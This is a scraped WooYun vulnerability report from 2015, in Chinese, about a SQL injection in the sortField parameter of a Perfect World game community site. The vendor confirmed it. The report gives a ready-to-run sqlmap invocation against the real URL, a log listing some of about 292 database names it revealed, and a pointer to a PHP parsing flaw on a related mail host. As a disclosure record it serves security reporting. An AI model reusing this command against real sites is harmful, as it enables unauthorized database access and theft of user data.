完美世界某游戏社区主站存在SQL注入近三百数据裤(包括dota2)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0116302

漏洞标题：完美世界某游戏社区主站存在SQL注入近三百数据裤(包括dota2)

漏洞作者： mango

提交时间：2015-05-26 16:04

修复时间：2015-07-10 18:24

公开时间：2015-07-10 18:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-26：细节已通知厂商并且等待厂商处理中
2015-05-26：厂商已经确认，细节仅向厂商公开
2015-06-05：细节向核心白帽子及相关领域专家公开
2015-06-15：细节向普通白帽子公开
2015-06-25：细节向实习白帽子公开
2015-07-10：细节向公众公开

简要描述：

看前面一直有人提交漏洞送礼物呀~我也来求个礼物~~~机械键盘么？刚好缺个

详细说明：

http://www.17y.com 问题出在这个站

"http://www.17y.com/sds/fame" --data "method=listLevel&nowPage=1&pageSize=20&sortField=1&sortOrderby=false&zid=-1" -p sortField --dbs --level 3

丢sqlmap跑~~ sortField 参数问题哦~~

裤子太多了、、、跑起来很慢啊

漏洞证明：

[15:53:21] [INFO] fetching database names
[15:53:21] [INFO] fetching number of databases
[15:53:21] [INFO] resumed: 292
[15:53:21] [INFO] resumed: information_schema
[15:53:21] [INFO] resumed: basic_mb_0
[15:53:21] [INFO] resumed: basic_mb_1
[15:53:21] [INFO] resumed: basic_mb_2
[15:53:21] [INFO] resumed: basic_mb_3
[15:53:21] [INFO] resumed: basic_mb_public
[15:53:21] [INFO] resumed: cms
[15:53:21] [INFO] resumed: dota2_forum_0
[15:53:21] [INFO] resumed: dota2_forum_1
[15:53:21] [INFO] resumed: dota2_forum_2
[15:53:21] [INFO] resumed: dota2_forum_3
[15:53:21] [INFO] resumed: dota2_forum_public
[15:53:21] [INFO] resumed: dz_data
[15:53:21] [INFO] resumed: gm
[15:53:21] [INFO] resumed: gt_raffle
[15:53:21] [INFO] resumed: gt_ucenter
[15:53:21] [INFO] resumed: mhzx_forum_0
[15:53:21] [INFO] resumed: mhzx_forum_1
[15:53:21] [INFO] resumed: mhzx_forum_2
[15:53:21] [INFO] resumed: mhzx_forum_3
[15:53:21] [INFO] resumed: mhzx_forum_public
[15:53:21] [INFO] resumed: mysql
[15:53:21] [INFO] resumed: sd_forum_0
[15:53:21] [INFO] resumed: sd_forum_1
[15:53:21] [INFO] resumed: sd_forum_2
[15:53:21] [INFO] resumed: sd_forum_3
[15:53:21] [INFO] resumed: sd_forum_public
[15:53:21] [INFO] resumed: sds_faction_public
[15:53:21] [INFO] resumed: sds_mb_0
[15:53:21] [INFO] resumed: sds_mb_1
[15:53:21] [INFO] resumed: sds_mb_2
[15:53:22] [INFO] resumed: sds_mb_3
[15:53:22] [INFO] resumed: sds_mb_public
[15:53:22] [INFO] resumed: sds_raffle
[15:53:22] [INFO] resumed: sdxl_forum_0
[15:53:22] [INFO] resumed: sdxl_forum_1
[15:53:22] [INFO] resumed: sdxl_forum_2
[15:53:22] [INFO] resumed: sdxl_forum_3
[15:53:22] [INFO] resumed: sdxl_forum_public
[15:53:22] [INFO] resumed: sdxl_raffle
[15:53:22] [INFO] resumed: sdzhidao
[15:53:22] [INFO] resumed: shediao_raffle
[15:53:22] [INFO] resumed: short_url
[15:53:22] [INFO] resumed: sm_activity
[15:53:22] [INFO] resumed: sns_activity
[15:53:22] [INFO] resumed: sns_activity_public
[15:53:22] [INFO] resumed: sns_album_0
[15:53:22] [INFO] resumed: sns_album_1
[15:53:22] [INFO] resumed: sns_album_2
[15:53:22] [INFO] resumed: sns_album_3
[15:53:22] [INFO] resumed: sns_album_public
[15:53:22] [INFO] resumed: sns_auth
[15:53:22] [INFO] resumed: sns_draft_public
[15:53:22] [INFO] resumed: sns_exp_0
[15:53:22] [INFO] resumed: sns_exp_1
[15:53:22] [INFO] resumed: sns_exp_2
[15:53:22] [INFO] resumed: sns_exp_3
[15:53:22] [INFO] resumed: sns_exp_public
[15:53:22] [INFO] resumed: sns_fame_public
[15:53:22] [INFO] resumed: sns_feed_0
[15:53:22] [INFO] resumed: sns_feed_1
[15:53:22] [INFO] resumed: sns_feed_2
[15:53:22] [INFO] resumed: sns_feed_3
[15:53:22] [INFO] resumed: sns_feed_public
[15:53:22] [INFO] resumed: sns_forum_0
[15:53:22] [INFO] resumed: sns_forum_1
[15:53:22] [INFO] resumed: sns_forum_2
[15:53:22] [INFO] resumed: sns_forum_3
[15:53:22] [INFO] resumed: sns_forum_public
[15:53:22] [INFO] resumed: sns_game_0
[15:53:22] [INFO] resumed: sns_game_1
[15:53:22] [INFO] resumed: sns_game_2
[15:53:22] [INFO] resumed: sns_game_3
[15:53:22] [INFO] resumed: sns_game_public
[15:53:22] [INFO] resumed: sns_help_0
[15:53:22] [INFO] resumed: sns_hiloid_1
[15:53:22] [INFO] resumed: sns_image_0
[15:53:22] [INFO] resumed: sns_image_1
[15:53:22] [INFO] resumed: sns_image_2
[15:53:22] [INFO] resumed: sns_image_3
[15:53:22] [INFO] resumed: sns_imagenew_0
[15:53:22] [INFO] resumed: sns_imagenew_1
[15:53:22] [INFO] resumed: sns_imagenew_2
[15:53:22] [INFO] resumed: sns_imagenew_3
[15:53:22] [INFO] resumed: sns_long_article_0
[15:53:22] [INFO] resumed: sns_mb_0
[15:53:22] [INFO] resumed: sns_mb_1
[15:53:22] [INFO] resumed: sns_mb_2
[15:53:22] [INFO] resumed: sns_mb_3
[15:53:22] [INFO] resumed: sns_mb_public
[15:53:22] [INFO] resumed: sns_message_0
[15:53:22] [INFO] resumed: sns_message_1
[15:53:22] [INFO] resumed: sns_message_2
[15:53:22] [INFO] resumed: sns_message_3
[15:53:22] [INFO] resumed: sns_passport_0
[15:53:22] [INFO] resumed: sns_passport_1
[15:53:22] [INFO] resumed: sns_passport_10
[15:53:22] [INFO] resumed: sns_passport_11
[15:53:22] [INFO] resumed: sns_passport_12
[15:53:22] [INFO] resumed: sns_passport_13
[15:53:22] [INFO] resumed: sns_passport_14
[15:53:22] [INFO] resumed: sns_passport_15
.................

太多了就不跑了
再送个福利给你们~
http://mail.173.com/media/logo.png/.php
php解析漏洞~ 可以注册但是上传点就有点坑~没有细研究

修复方案：

版权声明：转载请注明来源 mango@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-05-26 18:23

厂商回复：

感谢洞主对完美世界的关注，我们将尽快修补。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0116302

漏洞标题：完美世界某游戏社区主站存在SQL注入近三百数据裤(包括dota2)

相关厂商：完美世界

漏洞作者： mango

提交时间：2015-05-26 16:04

修复时间：2015-07-10 18:24

公开时间：2015-07-10 18:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 mango@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0116302

漏洞标题：完美世界某游戏社区主站存在SQL注入近三百数据裤(包括dota2)

相关厂商：完美世界

漏洞作者： mango

提交时间：2015-05-26 16:04

修复时间：2015-07-10 18:24

公开时间：2015-07-10 18:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0116302"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 mango@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：